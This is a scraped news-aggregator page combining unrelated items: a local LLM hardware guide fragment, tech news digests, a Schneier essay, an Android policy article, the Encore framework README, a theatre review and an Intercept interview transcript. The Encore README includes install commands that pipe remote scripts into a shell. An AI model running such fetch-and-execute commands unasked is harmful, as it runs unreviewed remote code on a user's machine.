  4. Multi-GPU Interconnect Bandwidth (if applicable)

    • NVLink: 56 GB/s
    • PCIe: 32 GB/s, higher latency
  5. CPU RAM Bandwidth / Compute Power (when offloading to CPU)
    DDR5 >> DDR4, multi-channel >> single-channel

  6. SSD Read Speed
    PCIe 4.0 x4: 7 GB/s

If you’re building your own rig, consider “scavenging” older cards like the 2080 Ti, MI50, or V100.

Framework Selection and Common Optimization Techniques

Quantization

Models are typically trained in FP16 precision, and published weights are often in this format. During inference, reducing floating-point precision can significantly cut memory usage.

Rule of thumb: Quantization levels Q6 (6-bit) and above—such as Q7 or FP8—have negligible impact on model performance. Q5 causes slight degradation, Q4 is noticeably worse, and Q3 or below might as well be a different model entirely.

Unsloth publishes many quantized versions of popular models.

CPU Offload

Move some model layers to the CPU, allowing both CPU and GPU to compute together.

Works especially well for MoE models with sparse activation.

https://github.com/ggml-org/llama.cpp

Pros: Optimized for CPU/GPU hybrid inference, mobile-friendly, extremely popular, widely supported by models
Cons: No tensor parallelism support, poor multi-GPU utilization

https://github.com/ztxz16/fastllm

Pros: Made by Chinese developers, supports diverse hardware, good CPU/GPU hybrid inference, includes unique performance optimizations
Cons: Fewer supported models, limited documentation, occasional bugs

Magit manuals are available online again

Hacker News
github.com
2025-11-14 12:09:59
Comments...
Original Article

I'm just getting started with Magit, and it works in my Emacs, but I wanted to go over some tutorials from the webpage. magit.vc does not work currently.

Show HN: European Tech News in 6 Languages

Hacker News
europedigital.cloud
2025-11-14 12:00:57
Comments...
Original Article

Daily digest of all European digital development news

They stole almost 23,000 euros with the SIM swapping scam. Now Vodafone and Ibercaja will have to return it

They stole almost 23,000 euros with the SIM swapping scam. Now Vodafone and Ibercaja will have to return it

Vodafone and Ibercaja were ordered to refund nearly €23,000 to a customer scammed via SIM swapping. The court ruled the companies were liable after fraudsters duplicated the victim's SIM and stole the money.

November 13, 2025 at 16:30

The anti-abuse bracelets were going to be a technical solution to a social problem. They are generating a chaos of incidents

The anti-abuse bracelets were going to be a technical solution to a social problem. They are generating a chaos of incidents

The Spanish Cometa system, managing anti-abuse bracelets, suffered a technical incident causing service overload and triggering an emergency protocol. The issue affected the safety of approximately 4,500 women using the devices, with roughly 10% of alerts causing system failures.

November 13, 2025 at 16:00

Digital Markets Act: EU Commission Accuses Google of Discrimination Against News Sites

Digital Markets Act: EU Commission Accuses Google of Discrimination Against News Sites

Brussels launched a new investigation into Google's parent company, Alphabet, for potential Digital Markets Act violations. The EU suspects Google's search results may discriminate against news websites, impacting their visibility.

November 13, 2025 at 15:18

FMC raises €100M as it unveils new class of memory chips for the AI era

FMC raises €100M as it unveils new class of memory chips for the AI era

FMC secured €100 million to revolutionize memory chips, aiming for faster, more energy-efficient AI data centers. The funding, led by HV Capital and DTCF, will help the company compete with global chip manufacturers.

November 13, 2025 at 14:46

DMA: EU Commission examines possible media discrimination by Google

DMA: EU Commission examines possible media discrimination by Google

The European Commission investigates Google over potential media discrimination in its search rankings, impacting legitimate content visibility. This probes whether Google's practices violate the Digital Markets Act, especially for news outlets.

November 13, 2025 at 14:28

The biggest European security tech deals in H1 2025

The biggest European security tech deals in H1 2025

Paris-based Didomi, a consent and privacy management platform, secured €72M in funding during the first half of 2025. This allows businesses to manage user data choices while ensuring compliance with global data regulations.

November 13, 2025 at 13:00

Zilch nets $175M as eyes "strategic" M&A

Zilch nets $175M as eyes "strategic" M&A

Zilch, a UK fintech, secured over $175 million in funding, led by KKCG, to fuel growth and acquisitions. The company, with over 5 million customers, aims to expand its brand and product development.

November 13, 2025 at 12:10

Introw raises $3M to redefine partner sales with AI

Introw raises $3M to redefine partner sales with AI

Ghent-based startup Introw secured $3M led by Visionaries Club to redefine partner sales with its AI platform. The platform connects quickly to a company's CRM, reducing setup time from months to minutes, and has already facilitated tens of thousands of partner interactions since launching in 2023.

November 13, 2025 at 12:00

Commission opens investigation into potential Digital Markets Act breach by Google in demoting media publishers' content in search results

Commission opens investigation into potential Digital Markets Act breach by Google in demoting media publishers' content in search results

The European Commission launched an investigation into Google for potentially violating the Digital Markets Act by demoting media publishers' content. The probe focuses on Google's "site reputation abuse policy," which the Commission suspects impacts publishers' ability to conduct business.

November 13, 2025 at 11:04

European Commission Digital Strategy

Cronvall secures €3.9M to scale smarter industrial procurement across Europe

Cronvall secures €3.9M to scale smarter industrial procurement across Europe

Cronvall, a Finnish tech company, secured €3. 9M to scale its digital industrial procurement platform across Europe....

November 13, 2025 at 11:00

Judge grants Meta limited postponement in Bits of Freedom lawsuit

Judge grants Meta limited postponement in Bits of Freedom lawsuit

Meta secures a limited postponement in a lawsuit brought by Bits of Freedom regarding user feed choices on Instagram and Facebook. The court granted the delay after Meta argued it couldn't implement the required changes within the original two-week timeframe.

November 13, 2025 at 09:30

The AI Act isn’t enough: closing the dangerous loopholes that enable rights violations

The AI Act isn’t enough: closing the dangerous loopholes that enable rights violations

The EU's AI Act faces criticism for loopholes enabling unchecked AI use in national security and law enforcement, risking mass surveillance. EDRi affiliate, Danes je nov dan, recommends Slovenia adopt stricter safeguards to address these issues.

November 13, 2025 at 09:30

X faces DSA probe in Ireland over its content moderation system

X faces DSA probe in Ireland over its content moderation system

X faces a probe in Ireland over its content moderation system under the Digital Services Act. The investigation will examine if users can appeal content moderation decisions.

November 13, 2025 at 09:12

Checklist: How digitally resilient is your organization?

Checklist: How digitally resilient is your organization?

Dutch organizations are encouraged to assess their digital resilience against ransomware attacks using a new readiness checklist. The checklist helps organizations evaluate current security measures and identify areas for improvement in prevention, crisis recovery, and governance.

November 13, 2025 at 09:11

Forthcoming Digital Omnibus would mark point of no return

Forthcoming Digital Omnibus would mark point of no return

Civil society groups are urging the European Commission to halt the Digital Omnibus, a proposed package they claim will weaken key EU laws. The coalition of 127 organizations says the proposals would be the biggest rollback of digital rights in EU history.

November 13, 2025 at 09:01

Backed VC closes $100M Fund III and marks 100th investment milestone

Backed VC closes $100M Fund III and marks 100th investment milestone

Backed VC closes its third fund at $100 million and celebrates its 100th investment in frontier tech startups. The fund will focus on AI-native therapeutics, blockchain, and manufacturing automation, with previous investments yielding five unicorns.

November 13, 2025 at 09:00

Skycore Semiconductors secures €5M to drive next-generation AI data centre innovation

Skycore Semiconductors secures €5M to drive next-generation AI data centre innovation

Danish startup Skycore Semiconductors secured €5 million in seed funding to develop Power IC technology for AI data centers. The company’s solutions aim to address power infrastructure challenges with 800V high-voltage direct current (HVDC) architectures.

November 13, 2025 at 09:00

CommerceClarity completes €2.7M funding to power the agentic era of e-commerce

CommerceClarity completes €2.7M funding to power the agentic era of e-commerce

Italian startup CommerceClarity secured €2. 7 million to fuel the agentic era of e-commerce with its AI operating system....

November 13, 2025 at 07:30

Vendep Capital raises €80M to back the next wave of AI-era SaaS founders

Vendep Capital raises €80M to back the next wave of AI-era SaaS founders

Finnish VC firm Vendep Capital launches an €80 million fund to back early-stage SaaS founders in the Nordics and Baltics. The fund, backed by European investors, will invest in approximately 20 startups with initial investments between €100k and €3M.

November 13, 2025 at 07:01

CHAOS attracts €2M to scale AI platform and reinvent real estate

CHAOS attracts €2M to scale AI platform and reinvent real estate

Finnish data-intelligence company CHAOS secures €2 million to scale its AI platform for the real estate industry. The funding will fuel expansion across the Nordics and DACH regions, offering AI-driven insights to developers and investors.

November 13, 2025 at 07:00

The Role of Humans in an AI-Powered World

Schneier
www.schneier.com
2025-11-14 12:00:33
As AI capabilities grow, we must delineate the roles that should remain exclusively human. The line seems to be between fact-based decisions and judgment-based decisions. For example, in a medical context, if an AI was demonstrably better at reading a test result and diagnosing cancer than a human, ...
Original Article

As AI capabilities grow, we must delineate the roles that should remain exclusively human. The line seems to be between fact-based decisions and judgment-based decisions.

For example, in a medical context, if an AI was demonstrably better at reading a test result and diagnosing cancer than a human, you would take the AI in a second. You want the more accurate tool. But justice is harder because justice is inherently a human quality in a way that “Is this tumor cancerous?” is not. That’s a fact-based question. “What’s the right thing to do here?” is a human-based question.

Chess provides a useful analogy for this evolution. For most of history, humans were best. Then, in the 1990s, Deep Blue beat the best human. For a while after that, a good human paired with a good computer could beat either one alone. But a few years ago, that changed again, and now the best computer simply wins. There will be an intermediate period for many applications where the human-AI combination is optimal, but eventually, for fact-based tasks, the best AI will likely surpass both.

The enduring role for humans lies in making judgments, especially when values come into conflict. What is the proper immigration policy? There is no single “right” answer; it’s a matter of feelings, values, and what we as a society hold dear. A lot of societal governance is about resolving conflicts between people’s rights—my right to play my music versus your right to have quiet. There’s no factual answer there. We can imagine machines will help; perhaps once we humans figure out the rules, the machines can do the implementing and kick the hard cases back to us. But the fundamental value judgments will likely remain our domain.

This essay originally appeared in IVY .

Tags: ,

Posted on November 14, 2025 at 7:00 AM 0 Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.

Google backpedals on new Android developer registration rules

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 11:54:44
Google is backpedaling on its decision to introduce new identity verification rules for all developers, stating that it will also introduce accounts for limited app distribution and will allow users to install apps from unverified devs. [...]...
Original Article

Android

Google is backpedaling on its decision to introduce new identity verification rules for all developers, stating that it will also introduce accounts for limited app distribution and will allow users to install apps from unverified devs.

As announced in August , Google was planning to introduce what it called "Developer Verification" starting in 2026 to block malware spreading via sideloaded apps sourced from outside the official Google Play app store.

The new rules require that all apps must originate from developers with verified identities to be installed on certified Android devices; otherwise, their installation will be blocked.

Wiz

However, the announcement was met with widespread backlash from Android users and developers (outraged by the registration process, which required them to pay a fee and provide government identification), who organized to report Google to their national regulators and discourage others from signing up for Google's developer registration early access program.

F-Droid, the most popular third-party Android app store, also warned last month that Google's new registration could mean the end of the project.

"We do not believe that developer registration is motivated by security. We believe it is about consolidating power and tightening control over a formerly open ecosystem," F-Droid said .

In response to the negative feedback, Google stated that it will "shape a dedicated account type" for developers who wish to distribute apps to limited audiences, such as family or friends, "without going through the full verification requirements."

The company also announced that it is developing a "new advanced flow" for experienced users with a higher risk tolerance who wish to sideload unverified apps. This new system will provide warnings about the associated risks but will ultimately allow users to make their own choices.

"We appreciate the community's engagement and have heard the early feedback – specifically from students and hobbyists who need an accessible path to learn, and from power users who are more comfortable with security risks. We are making changes to address the needs of both groups," said Matthew Forsythe , Director of Product Management for Android App Safety.

With these concessions in place, Google has started inviting developers distributing outside of the Play Store to early access for developer verification in the Android Developer Console, and also plans to invite Play developers to the program starting November 25.

Android developer verification will be open to all developers in March 2026. Beginning in September 2026, apps must be registered by verified developers to be installed on Android devices in Brazil, Indonesia, Singapore, and Thailand, with a global rollout planned for 2027.

Wiz

The 2026 CISO Budget Benchmark

It's budget season! Over 300 CISOs and security leaders have shared how they're planning, spending, and prioritizing for the year ahead. This report compiles their insights, allowing readers to benchmark strategies, identify emerging trends, and compare their priorities as they head into 2026.

Learn how top leaders are turning investment into measurable impact.

Show HN: Encore – Type-safe back end framework that generates infra from code

Hacker News
github.com
2025-11-14 11:41:47
Comments...
Original Article

encore icon

Open Source Framework for creating type-safe distributed systems with declarative infrastructure

  • Backend Frameworks: Encore.ts and Encore.go simplify creating microservices and type-safe APIs, and provide an AI-ready declarative approach to define infrastructure in code.
  • Local Development: Encore's CLI automatically manages local infrastructure and provides a development dashboard with tracing, service catalog, and architecture diagrams.
  • Infrastructure Integration: Simplified integration with cloud infrastructure using the open source CLI ( learn more ), or using the optional Encore Cloud platform to automate DevOps and infrastructure provisioning in your own cloud on AWS and GCP.

⭐ Star this repository to help spread the word.

Install Encore:

  • macOS: brew install encoredev/tap/encore
  • Linux: curl -L https://encore.dev/install.sh | bash
  • Windows: iwr https://encore.dev/install.ps1 | iex

Create your first app:

  • TypeScript: encore app create --example=ts/hello-world
  • Go: encore app create --example=hello-world

Add Encore LLM instructions to your app:

How it works

Encore's open source backend frameworks Encore.ts and Encore.go enable you to define resources like services, databases, cron jobs, and Pub/Sub, as type-safe objects in your application code.

With the frameworks you only define infrastructure semantics the things that matter to your application's behavior — not configuration for specific cloud services. Encore parses your application and builds a graph of both its logical architecture and its infrastructure requirements, it then automatically generates boilerplate and helps orchestrate the relevant infrastructure for each environment. This means the same application code can be used to run locally, test in preview environments, and deploy to cloud environments on e.g. AWS and GCP.

This often removes the need for separate infrastructure configuration like Terraform, increases standardization in both your codebase and infrastructure, and makes your application highly portable across cloud providers.

Encore is fully open source, there is no proprietary code running in your application .

Example: Hello World

Defining microservices and API endpoints is incredibly simple—with less than 10 lines of code, you can create a production-ready, deployable service.

Hello World in Encore.ts

import { api } from "encore.dev/api";

export const get = api(
  { expose: true, method: "GET", path: "/hello/:name" },
  async ({ name }: { name: string }): Promise<Response> => {
    const msg = `Hello ${name}!`;
    return { message: msg };
  }
);

interface Response {
  message: string;
}

Hello World in Encore.go

package hello

//encore:api public path=/hello/:name
func World(ctx context.Context, name string) (*Response, error) {
	msg := fmt.Sprintf("Hello, %s!", name)
	return &Response{Message: msg}, nil
}

type Response struct {
	Message string
}

Example: Using Pub/Sub

If you want a Pub/Sub Topic, you declare it directly in your application code and Encore will integrate the infrastructure and generate the boilerplate code necessary. Encore supports the following Pub/Sub infrastructure:

  • NSQ for local environments (automatically provisioned by Encore's CLI)
  • GCP Pub/Sub for environments on GCP
  • SNS/SQS for environments on AWS

Using Pub/Sub in Encore.ts

import { Topic } "encore.dev/pubsub"

export interface SignupEvent {
    userID: string;
}

export const signups = new Topic<SignupEvent>("signups", {
    deliveryGuarantee: "at-least-once",
});

Using Pub/Sub in Encore.go

import "encore.dev/pubsub"

type User struct { /* fields... */ }

var Signup = pubsub.NewTopic[*User]("signup", pubsub.TopicConfig{
  DeliveryGuarantee: pubsub.AtLeastOnce,
})

// Publish messages by calling a method
Signup.Publish(ctx, &User{...})

--

For more info: See example apps: Example Apps Repo

See products being build with Encore: Showcase

Have questions? Join the friendly developer community on Discord .

Talk to a human: Book a 1:1 demo with one of our founders.

Intro video

Watch the intro video for a quick introduction to Encore concepts & code examples.

Encore Intro Video

Introduction to Encore

Building scalable applications with cloud services is powerful but often frustrating. Developers face complex setups and repetitive tasks that slow them down.

Encore solves this with an all-in-one backend development toolkit, streamlining everything from local testing to cloud integration and DevOps.

Encore Overview

Learn more in the docs

See how to use the backend frameworks in the docs:

Using Encore: An end-to-end workflow from local to cloud

Encore provides purpose-built tooling for each step in the development process, from local development and testing, to cloud DevOps. Here we'll cover the key features for each part of the process.

Local Development

Local Development

When you run your app locally using the Encore CLI , Encore parses your code and automatically sets up the necessary local infrastructure on the fly. No more messing around with Docker Compose!

You also get built-in tools for an efficient workflow when creating distributed systems and event-driven applications:

  • Local environment matches cloud: Encore automatically handles the semantics of service communication and interfacing with different types of infrastructure services, so that the local environment is a 1:1 representation of your cloud environment.
  • Cross-service type-safety: When building microservices applications with Encore, you get type-safety and auto-complete in your IDE when making cross-service API calls.
  • Type-aware infrastructure: With Encore, infrastructure like Pub/Sub queues are type-aware objects in your program. This enables full end-to-end type-safety when building event-driven applications.
  • Secrets management: Built-in secrets management for all environments.
  • Tracing: The local development dashboard provides local tracing to help understand application behavior and find bugs.
  • Automatic API docs & clients: Encore generates API docs and API clients in Go, TypeScript, JavaScript, and OpenAPI specification.

Here's a video showing the local development dashboard:

localdashvideo.2.mp4

Testing

testing

Encore comes with several built-in tools to help with testing:

  • Built-in service/API mocking: Encore provides built-in support for mocking API calls , and interfaces for automatically generating mock objects for your services.
  • Local test infra: When running tests locally, Encore automatically provides dedicated test infrastructure to isolate individual tests.
  • Local test tracing: The Local Development Dashboard provides distributed tracing for tests, providing great visibility into what's happening and making it easier to understand why a test failed.
  • Preview Environments: When using Encore Cloud (optional), it automatically provisions a temporary cloud-based Preview Environment for each Pull Request, an effective tool when doing end-to-end testing.

Optional: Automate your AWS/GCP with Encore Cloud

DevOps

Encore Cloud is Encore's managed service offering for teams wanting to focus their engineering effort on their product development, avoiding investing time in platformization and DevOps.

Encore Cloud provides automatic infrastructure provisioning in your cloud on AWS & GCP . So instead of writing Terraform, YAML, or clicking in cloud consoles, you connect your cloud account and simply deploy your application. Since using Encore's open source backend frameworks means your application code is cloud agnostic and not tied to any specific infrastructure services, Encore Cloud enables you to change your infrastructure depending on your evolving needs, without needing to make code changes or manually update infrastructure config files.

When you deploy, Encore Cloud automatically provisions infrastructure using battle-tested cloud services on AWS and GCP, such as:

  • Compute: GCP Cloud Run, AWS Fargate, Kubernetes (GKE and EKS)
  • Databases: GCP Cloud SQL, AWS RDS
  • Pub/Sub: GCP Pub/Sub, AWS SQS/SNS
  • Caches: GCP Memorystore, Amazon ElastiCache
  • Object Storage: GCS, Amazon S3
  • Secrets: GCP Secret Manager, AWS Secrets Manager
  • Etc.

Encore Cloud also includes cloud versions of Encore's built-in development tools:

Here's a video showing the Encore Cloud dashboard:

envs.mp4

Why use Encore?

  • Faster Development : Encore streamlines the development process with its backend frameworks, clear abstractions, and built-in local development tools.
  • Scalability & Performance : Encore simplifies building large-scale microservices applications that can handle growing user bases and demands, without the normal boilerplate and complexity.
  • Control & Standardization : Built-in tools like automated architecture diagrams, infrastructure tracking and approval workflows, make it easy for teams and leaders to get an overview of the entire application.
  • Security & Compliance : Encore Cloud helps ensure your application is secure and compliant by enforcing security standards like least privilege IAM, and provisioning infrastructure according to best practices for each cloud provider.
  • Reduced Costs : Encore Cloud's automatic infrastructure management minimizes wasteful cloud expenses and reduces DevOps workload, allowing you to work more efficiently.

Common use cases

Encore is designed to give teams a productive and less complex experience when solving most backend use cases. Many teams use Encore to build things like:

  • High-performance B2B Platforms
  • Fintech & Consumer apps
  • Global E-commerce marketplaces
  • Microservices backends for SaaS applications and mobile apps
  • And much more...

Getting started

  • 1. Install Encore:
    • macOS: brew install encoredev/tap/encore
    • Linux: curl -L https://encore.dev/install.sh | bash
    • Windows: iwr https://encore.dev/install.ps1 | iex
  • 2. Create your first app:
    • TypeScript: encore app create --example=ts/introduction
    • Go: encore app create --example=hello-world
  • 3. Star the project on GitHub to stay up-to-date
  • 4. Explore the Documentation to learn more about Encore's features
  • 5. Join Discord to ask questions and meet other Encore developers

Open Source

Everything needed to develop and deploy Encore applications is Open Source, including the backend frameworks, parser, compiler, runtime, and CLI. This includes all code needed for local development and everything that runs in your application when it is deployed.

The Open Source CLI also provides a mechanism to generate a Docker images for your application, so you easily self-host your application. Learn more in the docs .

Join the most pioneering developer community

Developers building with Encore are forward-thinkers who want to focus on creative programming and building great software to solve meaningful problems. It's a friendly place, great for exchanging ideas and learning new things! Join the conversation on Discord .

We rely on your contributions and feedback to improve Encore for everyone who is using it. Here's how you can contribute:

  • Star and watch this repository to help spread the word and stay up to date.
  • Meet fellow Encore developers and chat on Discord .
  • Follow Encore on Twitter .
  • Share feedback or ask questions via email .
  • Leave feedback on the Public Roadmap .
  • Send a pull request here on GitHub with your contribution.

Videos

Visuals

Code example (Go)

Encore.example.1.mp4

Local Development Dashboard

indexvideo_5.mp4

Generated Architecture Diagrams & Service Catalog

index_1.mp4

Auto-Provisioning Infrastructure & Multi-cloud Deployments

envs.mp4

Distributed Tracing & Metrics

indexxxxx.mp4

Frequently Asked Questions (FAQ)

Who's behind Encore?

Encore was founded by long-time backend engineers from Spotify, Google, and Monzo with over 50 years of collective experience. We’ve lived through the challenges of building complex distributed systems with thousands of services, and scaling to hundreds of millions of users.

Encore grew out of these experiences and is a solution to the frustrations that came with them: unnecessary crippling complexity and constant repetition of undifferentiated work that suffocates the developer’s creativity. With Encore, we want to set developers free to achieve their creative potential.

Who is Encore for?

For individual developers building for the cloud, Encore provides a radically improved experience. With Encore you’re able to stay in the flow state and experience the joy and creativity of building.

For startup teams who need to build a scalable backend to support the growth of their product, Encore lets them get up and running in the cloud within minutes. It lets them focus on solving the needs of their users, instead of spending most of their time re-solving the everyday challenges of building distributed systems in the cloud.

For individual teams in large organizations that want to focus on innovating and building new features, Encore lets them stop spending time on operations and onboarding new team members. Using Encore for new feature development is easy, just spin up a new backend service in a few minutes.

How is Encore different?

Encore is the only tool that understands what you’re building. Encore uses static analysis to deeply understand the application you’re building. This enables a unique developer experience that helps you stay in the flow as you’re building. For instance, you don't need to bother with configuring and managing infrastructure, setting up environments and keeping them in sync, or writing documentation and drafting architecture diagrams. Encore does all of this automatically out of the box.

Why does Encore provide infrastructure integrations through Encore Cloud?

We've found that to meaningfully improve the developer experience, you have to operate across the full stack. Unless you understand how an application is deployed, there are a large number of things in the development process that you can't simplify. That's why so many other developer tools have such a limited impact. With Encore's more integrated approach, we're able to unlock a radically better experience for developers.

What if I want to migrate away from Encore?

Encore is designed to let you go outside of the framework when you want to, and easily drop down in abstraction level when you need to, so you never run into any dead-ends.

Should you want to migrate away, it's straightforward and does not require a big rewrite. 99% of your code is regular Go or TypeScript.

Encore provides tools for self-hosting your application, by using the Open Source CLI to produce a standalone Docker image that can be deployed anywhere you'd like.

Contributing to Encore and building from source

See CONTRIBUTING.md .

Porn Play review – Ambika Mod excels as an academic undone by pornography addiction

Guardian
www.theguardian.com
2025-11-14 11:34:00
Royal Court theatre, London Sophia Chetin-Leuner’s drama toggles between digital and physical worlds as it traces a scholar’s grim compulsion ‘It’s not that deep,” Ani’s friend assures her. Who cares if she watches a lot of extreme pornography? But after the light is switched off, Ani can’t get thro...
Original Article

‘I t’s not that deep,” Ani’s friend assures her. Who cares if she watches a lot of extreme pornography? But after the light is switched off, Ani can’t get through their impromptu sleepover without masturbating to porn on her phone. The friend wakes up next to her and exits in disgust.

The same scenario has already led Ani, a 30-year-old academic, to break up with her partner. Like Phoebe Waller-Bridge’s Fleabag , she was using porn next to her boyfriend in bed. Fleabag darkly regaled us with her voracious YouPorn habit but Ani, despite her robust reasoning in their argument, is deeply troubled by her behaviour. So, too, is her father when Ani hides away in her old childhood bedroom with her laptop.

It’s frequently funny but this bold play by Sophia Chetin-Leuner captures the wearying compulsion of an addict, showing how the search for release has turned into grim habit. The characters in her previous play, This Might Not Be It, which also has caring at its core, have a phrase for this sort of desensitised state: “your tap’s been switched off”. In a riveting performance, Ambika Mod manages to make Ani’s isolation and emptiness as moving as it is unsettling.

Ambika Mod and Asif Khan in Porn Play.
Isolation and emptiness … Ambika Mod and Asif Khan in Porn Play. Photograph: Helen Murray

Key to the play’s success is the way Chetin-Leuner and director Josie Rourke skilfully toggle between the digital and physical worlds to emphasise the seductive, instant gratification of the internet where, as Bo Burnham put it , “anything that brain of yours can think of can be found”. Ani’s brain has accordingly been rewired and her restless search for comfort online is a constant amid the stress that comes with professional success and her grief after her mother’s death. She recognises those as triggers yet, tellingly, co-opts a friend’s sexual revelation to hide behind instead when discussing her behaviour.

As a play about chronic addiction, this story is full of secrets, emphasised by Yimei Zhao ’s inspired design which transforms the Royal Court’s small upstairs theatre into a padded den. It’s staged in the round, typically seen as giving nowhere to hide, but Ani conceals her laptop and other belongings between the folds of the cushioned floor. The concentric, vulva-like design of the space becomes a cocoon softly lit by Mark Henderson as Ani escapes into her ritual of internet porn. But it also resembles a vortex and, in the prologue, is used to evoke Eve staring at her reflection in Milton’s Paradise Lost.

Ambika Mod and Will Close in Porn Play.
Ethical unease … Ambika Mod and Will Close in Porn Play. Photograph: Helen Murray

Ani is a Milton scholar and the drama tussles not just with notions of lost innocence (the alternate meaning of “play” in the title) and the epic poem’s sexual politics but also the question of separating the art from the author’s behaviour. That ethical argument bleeds into Ani’s distinction between watching violent pornography (“it’s all fake”) and her IRL views of women and the world. The porn on Ani’s screens is shown in abstract, highlighting how the footage itself is almost inconsequential, and is matched by the thrumming, distorted ecstasy of Helen Skiera’s score.

The ambitious balance of tragedy, horror and comedy is best in a painful scene where Ani’s boyfriend holds the phone for her while she masturbates. It does not quite come off in a gynaecological appointment (for which a whole gurney is extracted from beneath the set) where Ani’s shame is voiced by her doctor.

Will Close, Lizzy Connolly and Asif Khan deftly handle multiple supporting roles between them in a show with sharply delineated movement direction by Wayne McGregor . The play’s strands are directly tied together through Ani and her father’s climactic speeches in the sort of ending that can often feel forced but is greatly persuasive here. It’s a play that confirms Chetin-Leuner as a clear-sighted yet sanguine chronicler of all manner of relationships, not least with ourselves.

Saikat Chakrabarti’s Plan for the Political Revolution

Intercept
theintercept.com
2025-11-14 11:00:00
AOC’s former chief of staff wants to primary the Democratic establishment. The post Saikat Chakrabarti’s Plan for the Political Revolution appeared first on The Intercept....
Original Article

It’s the end of an era. Rep. Nancy Pelosi, D-Calif., who counts among her legacies in Congress successfully undercutting the push for Medicare for All, announced last week that she is retiring from Congress. The two-time former speaker of the House made her announcement after Democrats made remarkable gains in nationwide elections, campaigning on affordability and standing up to the Trump administration.

“We are in this era where we need new ideas, we need new leaders, we need people who are going to push the party in a new direction,” says Saikat Chakrabarti, who is running to replace Pelosi and represent San Francisco in Congress, making economic inequality and corporate power the focal point of his politics. This week on The Intercept Briefing, host Akela Lacy speaks to Chakrabarti, the co-founder of the progressive outfit Justice Democrats who helped run the primary campaign of one of its first candidates, Rep. Alexandria Ocasio-Cortez, becoming her first chief of staff .

Answering Lacy’s question as to how he’ll get it done, Chakrabarti says, “In the 1930s, we had a really powerful, far right in this country. We were actually seeing Nazi rallies in Madison Square Garden, it was filling the stadium. And the way we defeated that was FDR came in with the New Deal movement. He built this whole new economy and a whole new society that improved people’s lives so dramatically, it just killed this idea that you need an authoritarian to do it for you.” FDR “wasn’t advocating for going back to a pre-Great Depression era. He was advocating for something new. So that’s the way we get it done, and I see some movement towards that.”

Chakrabarti has been openly calling for House Minority Leader Hakeem Jeffries, D-N.Y., to be primaried and tells The Intercept that Senate Minority Leader Chuck Schumer should be too, following the end of the longest government shutdown in U.S. history, after eight Democratic senators — none who are up for reelection — joined forces with Republicans to pass a spending package.

“My goal, honestly, is to replace a huge part of the Democrat establishment,” says Chakrabarti. “I’m calling for primaries all across the country. … I think we actually have to get in there and be in a position of power where we can do all that, so it’s not going to be this constant compromising with the establishment, trying to figure out how we can push.” He adds, “I tried the pushing strategy — that’s what Justice Democrats was: We were trying to elect people to try to push the Democratic Party to do the right thing. It’s not going to work. We have to replace them.”

Listen to the full conversation of The Intercept Briefing on Apple Podcasts , Spotify , or wherever you listen.

Transcript

Akela Lacy: Welcome to The Intercept Briefing, I’m Akela Lacy.

It’s the end of an era.

Nancy Pelosi : I will not be seeking reelection to Congress.

AL: U.S. Representative Nancy Pelosi, who counts among her legacies in Congress successfully undercutting the push for Medicare for All, announced last week that she’s retiring from Congress. The Democrat and two-time former speaker of the House represents one of the country’s most liberal districts: San Francisco, California. And she has done so for nearly 40 years .

Pelosi made her announcement after Democrats made remarkable gains in nationwide elections. One takeaway, as we discussed in last week’s episode, is that voters want leaders who will fight for affordability and stand up to the Trump administration.

The race to replace Pelosi began before she publicly shared that she would not run for reelection. And although the California primary is seven months away, it’s already looking like a crowded and competitive field.

Saikat Chakrabarti was the first to jump into the race for Pelosi’s seat, setting up a challenge from her left.

Chakrabarti co-founded the progressive outfit Justice Democrats and helped run the first campaign and office of one of its first candidates: Rep. Alexandria Ocasio-Cortez.

He’s running on a campaign promising to push for universal health care and child care, enact a stock trading ban for members of Congress, cost-of-living issues, and to “stop funding the genocide in Gaza.”

He’s also criticized some of his colleagues in the progressive movement. So how is he positioning himself amid a wave of other primary challengers? And how would he actually fulfill his campaign promises? Saikat Chakrabarti joins me now. Saikat, welcome to the Intercept Briefing.

​​ Saikat Chakrabarti: Hey, thanks for having me.

AL: ​​Saikat, you’ve been described as a bit of a contradiction. You’re independently wealthy; you’re a founding engineer at the payment processing company Stripe; and Business Insider has said, you may be wealthier than Nancy Pelosi, one of the wealthiest members of Congress.

You’ve also made economic inequality and corporate power the focal point of your politics. You ran Alexandria Ocasio-Cortez’s campaign, became her first chief of staff , and co-founded Justice Democrats.

Most tech millionaires aren’t necessarily also progressive anti-establishment politicians. How do those two identities fit together for you?

Most tech millionaires aren’t necessarily also progressive anti-establishment politicians. How do those two identities fit together for you?

SC: I’d say most tech millionaires are really working toward their own demise as well in the long run. Because, I mean, look, I’ll give you my whole background. I grew up middle class in Texas. I grew up going to public schools. My parents actually grew up fairly poor. My parents are from India. They immigrated here in the 1970s, and my dad was a victim of partition, which was a catastrophic event — we basically split up India along religious lines after the Indian Revolution. And so his family were refugees that had to flee overnight from Bangladesh over to India. And so I grew up with the stories of their struggles. My dad grew up with a family of 12 in a one-bedroom apartment, often didn’t know where his next meal would be coming from.

“The way our economy is set up and has been set for so long is a lottery.”

I’d say my values really come from that — in two ways. Like one, it’s both these values that are shaped by how hard people who are totally capable have to actually work when they get a bad plate handed to them in life. But also just the way our economy is set up and has been set for so long is a lottery. Because at the end of the day, my dad struggled, but he won a lottery ticket; he got a visa to come to America. And I go back to Calcutta and I meet his friends and his family who all had it just as hard or just as hard-working, just as capable people who never made it out.

And so I joined the tech industry back in 2007, or 2009, actually, after college. And it was a time when tech really was being pitched as a solution to a lot of the big problems in the world. I was a completely apolitical person, and I bought it. I did think I was going in to try to solve some big issues. At the time like Muhammad Yunus was doing microfinance to alleviate poverty, yada, yada. And living in San Francisco and seeing unhoused people on the streets while I’m going to my tech job — it just gave me the feeling that maybe I’m actually not solving the problems I really want to work on.

So it sounds really cheesy now, but I quit the tech industry and I wrote a list. I was like, I want to work on inequality, poverty, and climate change. Again, I was not political at all — I was looking at mainly working in nonprofits. And that was around the time Bernie Sanders started running for president. I didn’t know if he had all the answers, but he was talking about those things in a very compelling way.

And so I joined that, and I ended up working on the Bernie campaign. I started a group — Justice Democrats — to recruit people to run on progressive values all around the country. And that’s how I ended up recruiting AOC to run, and ran her campaign, and ended up as her chief of staff.

“I worked hard, but I did not work harder than a teacher or a nurse or the people cleaning our offices did every single day. I just won the startup lottery.”

But I really believe at the end of the day, like a fundamental thing — and this is why I don’t think it is a contradiction — I experienced that lottery economy, that the startup economy really is in San Francisco. It’s this system where you can just hit it big if you just happen to be in the right place at the right time.

